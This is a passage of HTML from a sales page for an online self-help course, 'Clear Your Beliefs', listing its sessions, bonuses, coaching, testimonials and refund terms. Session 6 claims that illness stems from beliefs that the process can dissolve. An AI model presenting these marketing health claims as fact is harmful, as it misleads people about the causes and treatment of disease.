src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a 